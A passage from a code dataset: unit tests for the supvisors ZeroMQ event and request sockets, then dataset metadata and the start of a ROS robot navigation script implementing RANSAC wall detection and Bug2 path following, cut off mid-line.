self.subscriber = InternalEventSubscriber(\n self.supvisors.address_mapper.addresses,\n self.supvisors.options.internal_port)\n # socket configuration is meant to be blocking\n # however, a failure would block the unit test,\n # so a timeout is set for reception\n self.subscriber.socket.setsockopt(zmq.RCVTIMEO, 1000)\n # publisher does not wait for subscriber clients to work,\n # so give some time for connections\n time.sleep(1)\n\n def tearDown(self):\n \"\"\" Destroy the ZMQ context. \"\"\"\n # close the ZeroMQ sockets\n self.publisher.close()\n self.subscriber.close()\n\n def receive(self, event_type):\n \"\"\" This method performs a checked reception on the subscriber. \"\"\"\n try:\n self.subscriber.socket.poll(1000)\n return self.subscriber.receive()\n except zmq.Again:\n self.fail('Failed to get {} event'.format(event_type))\n\n def test_disconnection(self):\n \"\"\" Test the disconnection of subscribers. \"\"\"\n from supvisors.utils import InternalEventHeaders\n # get the local address\n local_address = self.supvisors.address_mapper.local_address\n # test remote disconnection\n address = next(address\n for address in self.supvisors.address_mapper.addresses\n if address != local_address)\n self.subscriber.disconnect([address])\n # send a tick event from the local publisher\n payload = {'date': 1000}\n self.publisher.send_tick_event(payload)\n # check the reception of the tick event\n msg = self.receive('Tick')\n self.assertTupleEqual((InternalEventHeaders.TICK,\n local_address, payload), msg)\n # test local disconnection\n self.subscriber.disconnect([local_address])\n # send a tick event from the local publisher\n self.publisher.send_tick_event(payload)\n # check the non-reception of the tick event\n with self.assertRaises(zmq.Again):\n self.subscriber.receive()\n\n def test_tick_event(self):\n \"\"\" Test the publication and subscription of the messages. \"\"\"\n from supvisors.utils import InternalEventHeaders\n # get the local address\n local_address = self.supvisors.address_mapper.local_address\n # send a tick event\n payload = {'date': 1000}\n self.publisher.send_tick_event(payload)\n # check the reception of the tick event\n msg = self.receive('Tick')\n self.assertTupleEqual((InternalEventHeaders.TICK,\n local_address, payload), msg)\n\n def test_process_event(self):\n \"\"\" Test the publication and subscription of the process events. \"\"\"\n from supvisors.utils import InternalEventHeaders\n # get the local address\n local_address = self.supvisors.address_mapper.local_address\n # send a process event\n payload = {'name': 'dummy_program', 'state': 'running'}\n self.publisher.send_process_event(payload)\n # check the reception of the process event\n msg = self.receive('Process')\n self.assertTupleEqual((InternalEventHeaders.PROCESS,\n local_address, payload), msg)\n\n def test_statistics(self):\n \"\"\" Test the publication and subscription of the statistics messages. \"\"\"\n from supvisors.utils import InternalEventHeaders\n # get the local address\n local_address = self.supvisors.address_mapper.local_address\n # send a statistics event\n payload = {'cpu': 15, 'mem': 5, 'io': (1234, 4321)}\n self.publisher.send_statistics(payload)\n # check the reception of the statistics event\n msg = self.receive('Statistics')\n self.assertTupleEqual((InternalEventHeaders.STATISTICS,\n local_address, payload), msg)\n\n\nclass RequestTest(unittest.TestCase):\n \"\"\" Test case for the InternalEventPublisher and InternalEventSubscriber\n classes of the supvisorszmq module. \"\"\"\n\n def setUp(self):\n \"\"\" Create a dummy supvisors, ZMQ context and sockets. \"\"\"\n from supvisors.supvisorszmq import RequestPusher, RequestPuller\n # the dummy Supvisors is used for addresses and ports\n self.supvisors = MockedSupvisors()\n # create pusher and puller\n self.pusher = RequestPusher(self.supvisors.logger)\n self.puller = RequestPuller()\n # socket configuration is meant to be blocking\n # however, a failure would block the unit test,\n # so a timeout is set for emission and reception\n self.puller.socket.setsockopt(zmq.SNDTIMEO, 1000)\n self.puller.socket.setsockopt(zmq.RCVTIMEO, 1000)\n\n def tearDown(self):\n \"\"\" Destroy the ZMQ context. \"\"\"\n # close the ZeroMQ sockets\n self.pusher.close()\n self.puller.close()\n\n def receive(self, event_type):\n \"\"\" This method performs a checked reception on the puller. \"\"\"\n try:\n return self.puller.receive()\n except zmq.Again:\n self.fail('Failed to get {} request'. format(event_type))\n\n def test_check_address(self):\n \"\"\" The method tests that the 'Check Address' request is sent\n and received correctly. \"\"\"\n from supvisors.utils import DeferredRequestHeaders\n self.pusher.send_check_address('10.0.0.1')\n request = self.receive('Check Address')\n self.assertTupleEqual((DeferredRequestHeaders.CHECK_ADDRESS,\n ('10.0.0.1', )), request)\n # test that absence of puller does not block the pusher\n # or raise any exception\n self.puller.close()\n try:\n self.pusher.send_check_address('10.0.0.1')\n except:\n self.fail('unexpected exception')\n\n def test_isolate_addresses(self):\n \"\"\" The method tests that the 'Isolate Addresses' request is sent\n and received correctly. \"\"\"\n from supvisors.utils import DeferredRequestHeaders\n self.pusher.send_isolate_addresses(['10.0.0.1', '10.0.0.2'])\n request = self.receive('Isolate Addresses')\n self.assertTupleEqual((DeferredRequestHeaders.ISOLATE_ADDRESSES,\n (['10.0.0.1', '10.0.0.2'])), request)\n # test that absence of puller does not block the pusher\n # or raise any exception\n self.puller.close()\n try:\n self.pusher.send_isolate_addresses(['10.0.0.1', '10.0.0.2'])\n except:\n self.fail('unexpected exception')\n\n def test_start_process(self):\n \"\"\" The method tests that the 'Start Process' request is sent\n and received correctly. \"\"\"\n from supvisors.utils import DeferredRequestHeaders\n self.pusher.send_start_process('10.0.0.1', 'application:program',\n ['-extra', 'arguments'])\n request = self.receive('Start Process')\n self.assertTupleEqual(\n (DeferredRequestHeaders.START_PROCESS,\n ('10.0.0.1', 'application:program', ['-extra', 'arguments'])),\n request)\n # test that absence of puller does not block the pusher\n # or raise any exception\n self.puller.close()\n try:\n self.pusher.send_start_process('10.0.0.1', 'application:program',\n ['-extra', 'arguments'])\n except:\n self.fail('unexpected exception')\n\n def test_stop_process(self):\n \"\"\" The method tests that the 'Stop Process' request is sent\n and received correctly. \"\"\"\n from supvisors.utils import DeferredRequestHeaders\n self.pusher.send_stop_process('10.0.0.1', 'application:program')\n request = self.receive('Stop Process')\n self.assertTupleEqual((DeferredRequestHeaders.STOP_PROCESS,\n ('10.0.0.1', 'application:program')), request)\n # test that absence of puller does not block the pusher\n # or raise any exception\n self.puller.close()\n try:\n self.pusher.send_stop_process('10.0.0.1', 'application:program')\n except:\n self.fail('unexpected exception')\n\n def test_restart(self):\n \"\"\" The method tests that the 'Restart' request is sent\n and received correctly. \"\"\"\n from supvisors.utils import DeferredRequestHeaders\n self.pusher.send_restart('10.0.0.1')\n request = self.receive('Restart')\n self.assertTupleEqual((DeferredRequestHeaders.RESTART,\n ('10.0.0.1', )), request)\n # test that absence of puller does not block the pusher\n # or raise any exception\n self.puller.close()\n try:\n self.pusher.send_restart('10.0.0.1')\n except:\n self.fail('unexpected exception')\n\n def test_shutdown(self):\n \"\"\" The method tests that the 'Shutdown' request is sent\n and received correctly. \"\"\"\n from supvisors.utils import DeferredRequestHeaders\n self.pusher.send_shutdown('10.0.0.1')\n request = self.receive('Shutdown')\n self.assertTupleEqual((DeferredRequestHeaders.SHUTDOWN,\n ('10.0.0.1', )), request)\n # test that absence of puller does not block the pusher\n # or raise any exception\n self.puller.close()\n try:\n self.pusher.send_shutdown('10.0.0.1')\n except:\n self.fail('unexpected exception')\n\n\nclass Payload:\n \"\"\" Dummy class just implementing a serial method. \"\"\"\n def __init__(self, data):\n self.data = data\n def copy(self):\n return self.data.copy()\n def serial(self):\n return self.data\n\n\nclass EventTest(unittest.TestCase):\n \"\"\" Test case for the EventPublisher and EventSubscriber classes\n of the supvisorszmq module. \"\"\"\n\n def setUp(self):\n \"\"\" Create a dummy supvisors and a ZMQ context. \"\"\"\n from supvisors.supvisorszmq import EventPublisher, EventSubscriber\n # the dummy Supvisors is used for addresses and ports\n self.supvisors = MockedSupvisors()\n # create the ZeroMQ context\n # create publisher and subscriber\n self.publisher = EventPublisher(\n self.supvisors.options.event_port,\n self.supvisors.logger)\n self.subscriber = EventSubscriber(\n zmq.Context.instance(),\n self.supvisors.options.event_port,\n self.supvisors.logger)\n # WARN: this subscriber does not include a subscription\n # when using a subscription, use a time sleep to give time\n # to PyZMQ to handle it\n # WARN: socket configuration is meant to be blocking\n # however, a failure would block the unit test,\n # so a timeout is set for reception\n self.subscriber.socket.setsockopt(zmq.RCVTIMEO, 1000)\n # create test payloads\n self.supvisors_payload = Payload({'state': 'running',\n 'version': '1.0'})\n self.address_payload = Payload({'state': 'silent',\n 'name': 'cliche01',\n 'date': 1234})\n self.application_payload = Payload({'state': 'starting',\n 'name': 'supvisors'})\n self.process_payload = Payload({'state': 'running',\n 'process_name': 'plugin',\n 'application_name': 'supvisors',\n 'date': 1230})\n self.event_payload = Payload({'state': 20,\n 'name': 'plugin',\n 'group': 'supvisors',\n 'now': 1230})\n\n def tearDown(self):\n \"\"\" Close the sockets. \"\"\"\n self.publisher.close()\n self.subscriber.close()\n\n def check_reception(self, header=None, data=None):\n \"\"\" The method tests that the message is received correctly\n or not received at all. \"\"\"\n if header and data:\n # check that subscriber receives the message\n try:\n msg = self.subscriber.receive()\n except zmq.Again:\n self.fail('Failed to get {} status'.format(header))\n self.assertTupleEqual((header, data), msg)\n else:\n # check the non-reception of the Supvisors status\n with self.assertRaises(zmq.Again):\n self.subscriber.receive()\n\n def check_supvisors_status(self, subscribed):\n \"\"\" The method tests the emission and reception of a Supvisors status,\n depending on the subscription status. \"\"\"\n from supvisors.utils import EventHeaders\n self.publisher.send_supvisors_status(self.supvisors_payload)\n if subscribed:\n self.check_reception(EventHeaders.SUPVISORS,\n self.supvisors_payload.data)\n else:\n self.check_reception()\n\n def check_address_status(self, subscribed):\n \"\"\" The method tests the emission and reception of an Address status,\n depending on the subscription status. \"\"\"\n from supvisors.utils import EventHeaders\n self.publisher.send_address_status(self.address_payload)\n if subscribed:\n self.check_reception(EventHeaders.ADDRESS,\n self.address_payload.data)\n else:\n self.check_reception()\n\n def check_application_status(self, subscribed):\n \"\"\" The method tests the emission and reception of an Application\n status, depending on the subscription status. \"\"\"\n from supvisors.utils import EventHeaders\n self.publisher.send_application_status(self.application_payload)\n if subscribed:\n self.check_reception(EventHeaders.APPLICATION,\n self.application_payload.data)\n else:\n self.check_reception()\n\n def check_process_event(self, subscribed):\n \"\"\" The method tests the emission and reception of a Process status,\n depending on the subscription status. \"\"\"\n from supvisors.utils import EventHeaders\n self.publisher.send_process_event('local_address', self.event_payload)\n if subscribed:\n expected = self.event_payload.data\n expected['address'] = 'local_address'\n self.check_reception(EventHeaders.PROCESS_EVENT, expected)\n else:\n self.check_reception()\n\n def check_process_status(self, subscribed):\n \"\"\" The method tests the emission and reception of a Process status,\n depending on the subscription status. \"\"\"\n from supvisors.utils import EventHeaders\n self.publisher.send_process_status(self.process_payload)\n if subscribed:\n self.check_reception(EventHeaders.PROCESS_STATUS,\n self.process_payload.data)\n else:\n self.check_reception()\n\n def check_subscription(self, supvisors_subscribed, address_subscribed,\n application_subscribed, event_subscribed, process_subscribed):\n \"\"\" The method tests the emission and reception of all status,\n depending on their subscription status. \"\"\"\n time.sleep(1)\n self.check_supvisors_status(supvisors_subscribed)\n self.check_address_status(address_subscribed)\n self.check_application_status(application_subscribed)\n self.check_process_event(event_subscribed)\n self.check_process_status(process_subscribed)\n\n def test_no_subscription(self):\n \"\"\" Test the non-reception of messages when subscription is not set. \"\"\"\n # at this stage, no subscription has been set\n # so nothing should be received\n self.check_subscription(False, False, False, False, False)\n\n def test_subscription_supvisors_status(self):\n \"\"\" Test the reception of Supvisors status messages\n when related subscription is set. \"\"\"\n # subscribe to Supvisors status only\n self.subscriber.subscribe_supvisors_status()\n self.check_subscription(True, False, False, False, False)\n # unsubscribe from Supvisors status\n self.subscriber.unsubscribe_supvisors_status()\n self.check_subscription(False, False, False, False, False)\n\n def test_subscription_address_status(self):\n \"\"\" Test the reception of Address status messages\n when related subscription is set. \"\"\"\n # subscribe to Address status only\n self.subscriber.subscribe_address_status()\n self.check_subscription(False, True, False, False, False)\n # unsubscribe from Address status\n self.subscriber.unsubscribe_address_status()\n self.check_subscription(False, False, False, False, False)\n\n def test_subscription_application_status(self):\n \"\"\" Test the reception of Application status messages\n when related subscription is set. \"\"\"\n # subscribe to Application status only\n self.subscriber.subscribe_application_status()\n self.check_subscription(False, False, True, False, False)\n # unsubscribe from Application status\n self.subscriber.unsubscribe_application_status()\n self.check_subscription(False, False, False, False, False)\n\n def test_subscription_process_event(self):\n \"\"\" Test the reception of Process event messages\n when related subscription is set. \"\"\"\n # subscribe to Process event only\n self.subscriber.subscribe_process_event()\n self.check_subscription(False, False, False, True, False)\n # unsubscribe from Process event\n self.subscriber.unsubscribe_process_event()\n self.check_subscription(False, False, False, False, False)\n\n def test_subscription_process_status(self):\n \"\"\" Test the reception of Process status messages\n when related subscription is set. \"\"\"\n # subscribe to Process status only\n self.subscriber.subscribe_process_status()\n self.check_subscription(False, False, False, False, True)\n # unsubscribe from Process status\n self.subscriber.unsubscribe_process_status()\n self.check_subscription(False, False, False, False, False)\n\n def test_subscription_all_status(self):\n \"\"\" Test the reception of all status messages\n when related subscription is set. \"\"\"\n # subscribe to every status\n self.subscriber.subscribe_all()\n self.check_subscription(True, True, True, True, True)\n # unsubscribe all\n self.subscriber.unsubscribe_all()\n self.check_subscription(False, False, False, False, False)\n\n def test_subscription_multiple_status(self):\n \"\"\" Test the reception of multiple status messages\n when related subscription is set. \"\"\"\n # subscribe to Application and Process Event\n self.subscriber.subscribe_application_status()\n self.subscriber.subscribe_process_event()\n self.check_subscription(False, False, True, True, False)\n # set subscription to Address and Process Status\n self.subscriber.unsubscribe_application_status()\n self.subscriber.unsubscribe_process_event()\n self.subscriber.subscribe_process_status()\n self.subscriber.subscribe_address_status()\n self.check_subscription(False, True, False, False, True)\n # add subscription to Supvisors Status\n self.subscriber.subscribe_supvisors_status()\n self.check_subscription(True, True, False, False, True)\n # unsubscribe all\n self.subscriber.unsubscribe_supvisors_status()\n self.subscriber.unsubscribe_address_status()\n self.subscriber.unsubscribe_process_status()\n self.check_subscription(False, False, False, False, False)\n\n\nclass SupervisorZmqTest(unittest.TestCase):\n \"\"\" Test case for the SupervisorZmq class of the supvisorszmq module. \"\"\"\n\n def setUp(self):\n \"\"\" Create a dummy supvisors. \"\"\"\n self.supvisors = MockedSupvisors()\n\n def test_creation_closure(self):\n \"\"\" Test the types of the attributes created. \"\"\"\n from supvisors.supvisorszmq import (SupervisorZmq, EventPublisher,\n InternalEventPublisher, RequestPusher)\n sockets = SupervisorZmq(self.supvisors)\n # test all attribute types\n self.assertIsInstance(sockets.publisher, EventPublisher)\n self.assertFalse(sockets.publisher.socket.closed)\n self.assertIsInstance(sockets.internal_publisher,\n InternalEventPublisher)\n self.assertFalse(sockets.internal_publisher.socket.closed)\n self.assertIsInstance(sockets.pusher, RequestPusher)\n self.assertFalse(sockets.pusher.socket.closed)\n # close the instance\n sockets.close()\n self.assertTrue(sockets.publisher.socket.closed)\n self.assertTrue(sockets.internal_publisher.socket.closed)\n self.assertTrue(sockets.pusher.socket.closed)\n\n\nclass SupvisorsZmqTest(unittest.TestCase):\n \"\"\" Test case for the SupvisorsZmq class of the supvisorszmq module. \"\"\"\n\n def setUp(self):\n \"\"\" Create a dummy supvisors. \"\"\"\n self.supvisors = MockedSupvisors()\n\n def test_creation_closure(self):\n \"\"\" Test the types of the attributes created. \"\"\"\n from supvisors.supvisorszmq import (SupvisorsZmq,\n InternalEventSubscriber, RequestPuller)\n sockets = SupvisorsZmq(self.supvisors)\n # test all attribute types\n self.assertIsInstance(sockets.internal_subscriber,\n InternalEventSubscriber)\n self.assertFalse(sockets.internal_subscriber.socket.closed)\n self.assertIsInstance(sockets.puller, RequestPuller)\n self.assertFalse(sockets.puller.socket.closed)\n # close the instance\n sockets.close()\n self.assertTrue(sockets.internal_subscriber.socket.closed)\n self.assertTrue(sockets.puller.socket.closed)\n\n\ndef test_suite():\n return unittest.findTestCases(sys.modules[__name__])\n\nif __name__ == '__main__':\n unittest.main(defaultTest='test_suite')\n\n", "sub_path": "supvisors/tests/test_supvisorszmq.py", "file_name": "test_supvisorszmq.py", "file_ext": "py", "file_size_in_byte": 26903, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "unittest.TestCase", "line_number": 29, "usage_type": "attribute"}, {"api_name": "supvisors.tests.base.MockedSupvisors", "line_number": 35, "usage_type": "call"}, {"api_name": "zmq.Context.instance", "line_number": 37, "usage_type": "call"}, {"api_name": "zmq.Context", "line_number": 37, "usage_type": "attribute"}, {"api_name": "supvisors.supvisorszmq.InternalEventPublisher", "line_number": 45, "usage_type": "call"}, {"api_name": "supvisors.supvisorszmq.InternalEventSubscriber", "line_number": 49, "usage_type": "call"}, {"api_name": "supvisors.supvisorszmq.EventPublisher", "line_number": 69, "usage_type": "call"}, {"api_name": "supvisors.supvisorszmq.EventSubscriber", "line_number": 70, "usage_type": "call"}, {"api_name": "zmq.Context.instance", "line_number": 70, "usage_type": "call"}, {"api_name": "zmq.Context", "line_number": 70, "usage_type": "attribute"}, {"api_name": "supvisors.supvisorszmq.RequestPusher", "line_number": 86, "usage_type": "call"}, {"api_name": "supvisors.supvisorszmq.RequestPuller", "line_number": 87, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 99, "usage_type": "attribute"}, {"api_name": "supvisors.tests.base.MockedSupvisors", "line_number": 108, "usage_type": "call"}, {"api_name": "supvisors.supvisorszmq.InternalEventPublisher", "line_number": 110, "usage_type": "call"}, {"api_name": "supvisors.supvisorszmq.InternalEventSubscriber", "line_number": 114, "usage_type": "call"}, {"api_name": "zmq.RCVTIMEO", "line_number": 120, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 123, "usage_type": "call"}, {"api_name": "zmq.Again", "line_number": 136, "usage_type": "attribute"}, {"api_name": "supvisors.utils.InternalEventHeaders.TICK", "line_number": 154, "usage_type": "attribute"}, {"api_name": "supvisors.utils.InternalEventHeaders", "line_number": 154, "usage_type": "name"}, {"api_name": "zmq.Again", "line_number": 161, "usage_type": "attribute"}, {"api_name": "supvisors.utils.InternalEventHeaders.TICK", "line_number": 174, "usage_type": "attribute"}, {"api_name": "supvisors.utils.InternalEventHeaders", "line_number": 174, "usage_type": "name"}, {"api_name": "supvisors.utils.InternalEventHeaders.PROCESS", "line_number": 187, "usage_type": "attribute"}, {"api_name": "supvisors.utils.InternalEventHeaders", "line_number": 187, "usage_type": "name"}, {"api_name": "supvisors.utils.InternalEventHeaders.STATISTICS", "line_number": 200, "usage_type": "attribute"}, {"api_name": "supvisors.utils.InternalEventHeaders", "line_number": 200, "usage_type": "name"}, {"api_name": "unittest.TestCase", "line_number": 204, "usage_type": "attribute"}, {"api_name": "supvisors.tests.base.MockedSupvisors", "line_number": 212, "usage_type": "call"}, {"api_name": "supvisors.supvisorszmq.RequestPusher", "line_number": 214, "usage_type": "call"}, {"api_name": "supvisors.supvisorszmq.RequestPuller", "line_number": 215, "usage_type": "call"}, {"api_name": "zmq.SNDTIMEO", "line_number": 219, "usage_type": "attribute"}, {"api_name": "zmq.RCVTIMEO", "line_number": 220, "usage_type": "attribute"}, {"api_name": "zmq.Again", "line_number": 232, "usage_type": "attribute"}, {"api_name": "supvisors.utils.DeferredRequestHeaders.CHECK_ADDRESS", "line_number": 241, "usage_type": "attribute"}, {"api_name": "supvisors.utils.DeferredRequestHeaders", "line_number": 241, "usage_type": "name"}, {"api_name": "supvisors.utils.DeferredRequestHeaders.ISOLATE_ADDRESSES", "line_number": 257, "usage_type": "attribute"}, {"api_name": "supvisors.utils.DeferredRequestHeaders", "line_number": 257, "usage_type": "name"}, {"api_name": "supvisors.utils.DeferredRequestHeaders.START_PROCESS", "line_number": 275, "usage_type": "attribute"}, {"api_name": "supvisors.utils.DeferredRequestHeaders", "line_number": 275, "usage_type": "name"}, {"api_name": "supvisors.utils.DeferredRequestHeaders.STOP_PROCESS", "line_number": 293, "usage_type": "attribute"}, {"api_name": "supvisors.utils.DeferredRequestHeaders", "line_number": 293, "usage_type": "name"}, {"api_name": "supvisors.utils.DeferredRequestHeaders.RESTART", "line_number": 309, "usage_type": "attribute"}, {"api_name": "supvisors.utils.DeferredRequestHeaders", "line_number": 309, "usage_type": "name"}, {"api_name": "supvisors.utils.DeferredRequestHeaders.SHUTDOWN", "line_number": 325, "usage_type": "attribute"}, {"api_name": "supvisors.utils.DeferredRequestHeaders", "line_number": 325, "usage_type": "name"}, {"api_name": "unittest.TestCase", "line_number": 346, "usage_type": "attribute"}, {"api_name": "supvisors.tests.base.MockedSupvisors", "line_number": 354, "usage_type": "call"}, {"api_name": "supvisors.supvisorszmq.EventPublisher", "line_number": 357, "usage_type": "call"}, {"api_name": "supvisors.supvisorszmq.EventSubscriber", "line_number": 360, "usage_type": "call"}, {"api_name": "zmq.Context.instance", "line_number": 361, "usage_type": "call"}, {"api_name": "zmq.Context", "line_number": 361, "usage_type": "attribute"}, {"api_name": "zmq.RCVTIMEO", "line_number": 370, "usage_type": "attribute"}, {"api_name": "zmq.Again", "line_number": 400, "usage_type": "attribute"}, {"api_name": "zmq.Again", "line_number": 405, "usage_type": "attribute"}, {"api_name": "supvisors.utils.EventHeaders.SUPVISORS", "line_number": 414, "usage_type": "attribute"}, {"api_name": "supvisors.utils.EventHeaders", "line_number": 414, "usage_type": "name"}, {"api_name": "supvisors.utils.EventHeaders.ADDRESS", "line_number": 425, "usage_type": "attribute"}, {"api_name": "supvisors.utils.EventHeaders", "line_number": 425, "usage_type": "name"}, {"api_name": "supvisors.utils.EventHeaders.APPLICATION", "line_number": 436, "usage_type": "attribute"}, {"api_name": "supvisors.utils.EventHeaders", "line_number": 436, "usage_type": "name"}, {"api_name": "supvisors.utils.EventHeaders.PROCESS_EVENT", "line_number": 449, "usage_type": "attribute"}, {"api_name": "supvisors.utils.EventHeaders", "line_number": 449, "usage_type": "name"}, {"api_name": "supvisors.utils.EventHeaders.PROCESS_STATUS", "line_number": 459, "usage_type": "attribute"}, {"api_name": "supvisors.utils.EventHeaders", "line_number": 459, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 468, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 564, "usage_type": "attribute"}, {"api_name": "supvisors.tests.base.MockedSupvisors", "line_number": 569, "usage_type": "call"}, {"api_name": "supvisors.supvisorszmq.SupervisorZmq", "line_number": 575, "usage_type": "call"}, {"api_name": "supvisors.supvisorszmq.EventPublisher", "line_number": 577, "usage_type": "name"}, {"api_name": "supvisors.supvisorszmq.InternalEventPublisher", "line_number": 580, "usage_type": "name"}, {"api_name": "supvisors.supvisorszmq.RequestPusher", "line_number": 582, "usage_type": "name"}, {"api_name": "unittest.TestCase", "line_number": 591, "usage_type": "attribute"}, {"api_name": "supvisors.tests.base.MockedSupvisors", "line_number": 596, "usage_type": "call"}, {"api_name": "supvisors.supvisorszmq.SupvisorsZmq", "line_number": 602, "usage_type": "call"}, {"api_name": "supvisors.supvisorszmq.InternalEventSubscriber", "line_number": 605, "usage_type": "name"}, {"api_name": "supvisors.supvisorszmq.RequestPuller", "line_number": 607, "usage_type": "name"}, {"api_name": "unittest.findTestCases", "line_number": 616, "usage_type": "call"}, {"api_name": "sys.modules", "line_number": 616, "usage_type": "attribute"}, {"api_name": "unittest.main", "line_number": 619, "usage_type": "call"}]} +{"seq_id": "368280479", "text": "#!/usr/bin/env python\nimport roslib\nfrom visualization_msgs.msg import Marker\nfrom visualization_msgs.msg import MarkerArray\nimport rospy\nimport math\nimport geometry_msgs\nfrom geometry_msgs.msg import Twist\nfrom sensor_msgs.msg import LaserScan\nfrom std_msgs.msg import Float32\nfrom nav_msgs.msg import Odometry\nimport numpy as np\nimport sys\nimport tf\nfrom math import radians\n# ref wiki.ros.org/rviz \ninput = np.empty(shape= [0,2])\npos_x = 0\npos_y = 0\norien_z = 0\nlaser_ranges = []\npi = 3.14\nwall_line = []\n\ndef ExtractPointsFromBaseScan(data):\n input = np.empty(shape= [0,2])\n global laser_ranges\n laser_ranges = data.ranges\n angle = data.angle_min \n points_list = []\n ran = range(150,270)\n for index, r in enumerate(data.ranges):\n if r < 3.0 and index in ran:\n x = r * np.cos(angle)\n y = r * np.sin(angle) \n input = np.append(input, [[x,y]], axis=0)\n angle = angle + data.angle_increment\n RansacImplementation(input)\n\ndef FindDistanceToALine(p1, p2, p):\n x1 = p1[0]\n y1 = p1[1]\n x2 = p2[0]\n y2 = p2[1]\n x = p[0]\n y = p[1]\n denominator = math.sqrt((x2 - x1)**2 + (y2 - y1)**2)\n numerator = abs((y2-y1)*x - (x2-x1)*y + x2*y1 - y2*x1)\n distance = (numerator/denominator)\n return distance\n\ndef FindDistance(p1, p2):\n x1 = p1[0]\n y1 = p1[1]\n x2 = p2[0]\n y2 = p2[1]\n denominator = math.sqrt((x2 - x1)**2 + (y2 - y1)**2)\n return denominator < 2\n\ndef createPoint(x,y):\n p = geometry_msgs.msg.Point()\n p.x = x\n p.y = y\n p.z = 0\n return p\n\ndef CheckForZero(p):\n return p[0] == 0 or p[1] == 0\n\ndef RansacImplementation(input):\n global wall_line\n if(input.shape[0] == 0):\n return\n # Ransac parameters\n ransac_iterations = 5 # number of iterations\n ransac_threshold = 0.05 # threshold\n ransac_ratio = 0.8 \n\n ratio = 0.0 \n points_list = [] \n model = []\n model_inliers = []\n for i in range(ransac_iterations):\n shuffle = np.random.shuffle(input)\n initial_points = input[0:2]\n test_points = input[2:]\n inliers = np.empty(shape= [0,2])\n num_of_inliers = 0.0\n for j in range(test_points.shape[0]):\n dis = FindDistanceToALine(initial_points[0], initial_points[1], test_points[j])\n if(dis < ransac_threshold):\n inliers = np.append(inliers, [test_points[j]], axis=0)\n num_of_inliers += 1\n if(num_of_inliers/float(test_points.shape[0]) > ratio):\n ratio = num_of_inliers/float(test_points.shape[0])\n model = initial_points\n model_inliers = inliers\n\n if(len(model) != 0):\n points_list.append(createPoint(model[0][0], model[0][1]))\n points_list.append(createPoint(model[1][0], model[1][1]))\n CreateLinesMarker(points_list, 0)\n\n #if not (FindDistance(model[0], model[1])):\n wall_line = model\n\n\ndef CreateLinesMarker(lines_list, id):\n rate = rospy.Rate(1)\n lines = Marker()\n lines.header.frame_id = \"/base_laser_link\"\n lines.ns = \"points_and_lines\"\n lines.header.stamp = rospy.Time.now()\n lines.id = id\n lines.pose.orientation.w = 1.0\n lines.action = Marker.ADD\n lines.type = Marker.LINE_LIST\n lines.scale.x = 0.3\n lines.scale.y = 0.\n if(id == 1):\n lines.color.g = 1.0\n else:\n lines.color.b = 1.0\n lines.color.a = 1.0\n t = rospy.Duration()\n lines.lifetime = t\n\n lines.points = lines_list\n # Publish the MarkerArray\n publisher.publish(lines) \n #rate.sleep()\n\ndef CallbackBPGT(msg):\n global orien_z, pos_x, pos_y\n msg_pos = msg.pose.pose.position\n msg_or = msg.pose.pose.orientation\n pos_x = msg_pos.x\n pos_y = msg_pos.y\n orien = tf.transformations.euler_from_quaternion([ msg_or.x, msg_or.y, msg_or.z, msg_or.w])\n orien_z = orien[2]\n\ndef CheckObstaclesInTheWay():\n global laser_ranges\n obstacles = 0\n if(len(laser_ranges) != 0):\n for r in range(170, 210):\n if(laser_ranges[r] < 1.5):\n obstacles += 1\n return obstacles > 0\n\ndef CheckObstaclesInTheFront():\n print('checking')\n global laser_ranges\n obstacles = 0\n if(len(laser_ranges) != 0):\n for r in range(50, 210):\n if(laser_ranges[r] < 1.5):\n obstacles += 1\n return obstacles > 0\n\ndef CheckObstaclesInTheLeft():\n global laser_ranges\n obstacles = 0\n if(len(laser_ranges) != 0):\n for r in range(90, 170):\n if(laser_ranges[r] < 1):\n obstacles += 1\n return obstacles > 5\n\ndef ComputeAng_VelForGS(goal_angle):\n if(abs(goal_angle) < pi/10):\n return 0\n return goal_angle\n\ndef ComputeAng_VelForWF(line, robot_angle):\n slope = (line[1][1] - line[0][1])/(line[1][0] - line[0][0])\n print(\" line slope = %s\" % math.atan(slope))\n \"\"\" if(abs(math.atan(slope) - robot_angle) < pi/10):\n return 0 \"\"\"\n return math.atan(slope) - robot_angle\n\ndef setVelocity(linear_vel, angular_vel):\n cmd = Twist()\n cmd.linear.x = linear_vel\n cmd.angular.z = angular_vel\n vel_pub.publish(cmd)\n\n\ndef bug2_implementation():\n global orien_z, pos_x, pos_y, wall_line\n atGoal = False\n goal = [4.5, 9.0]\n threshold_distance = 0.5\n linear_vel = 0 \n angular_vel = 0\n robot_state = 'GOALSEEK'\n line = []\n cmd = Twist()\n x = pos_x\n y = pos_y\n while not atGoal:\n print('===============================================')\n\n goal_distance = math.sqrt((goal[0]-pos_x)**2 + (goal[1]-pos_y)**2)\n robot_angle = orien_z #yaw\n goal_slope = math.atan((goal[1]-y)/(goal[0]-x))\n goal_angle = goal_slope - robot_angle\n points_list = [] \n points_list.append(createPoint(pos_x, pos_y))\n points_list.append(createPoint(goal[0], goal[1]))\n CreateLinesMarker(points_list, 2)\n print('goal_distance %s' % goal_distance)\n print('robot_angle %s' % robot_angle)\n print('goal_slope %s' % goal_slope) \n print('goal_angle %s' % goal_angle) \n\n if(goal_distance < threshold_distance):\n linear_vel = 0\n angular_vel = 0\n atGoal = True\n else:\n print('State %s' % robot_state)\n if(robot_state == 'GOALSEEK'):\n angular_vel = ComputeAng_VelForGS(goal_angle)\n linear_vel = 2.5\n if(CheckObstaclesInTheFront()):\n cmd.linear.x = 0\n \n robot_state = 'WALLFOLLOW'\n line = wall_line\n points_list = [] \n points_list.append(createPoint(line[0][0], line[0][1]))\n points_list.append(createPoint(line[1][0], line[1][1]))\n CreateLinesMarker(points_list, 1)\n print('Obstacles are there - line %s' % line)\n \n if(robot_state == 'WALLFOLLOW'):\n angular_vel = ComputeAng_VelForWF(wall_line, robot_angle)\n print('angular vel %s' % angular_vel)\n cmd.linear.x = 0\n cmd.angular.z = angular_vel\n vel_pub.publish(cmd)\n linear_vel = 0.3\n angular_vel = 0\n points_list.append(createPoint(wall_line[0][0], wall_line[0][1]))\n points_list.append(createPoint(wall_line[1][0], wall_line[1][1]))\n CreateLinesMarker(points_list, 1)\n if not 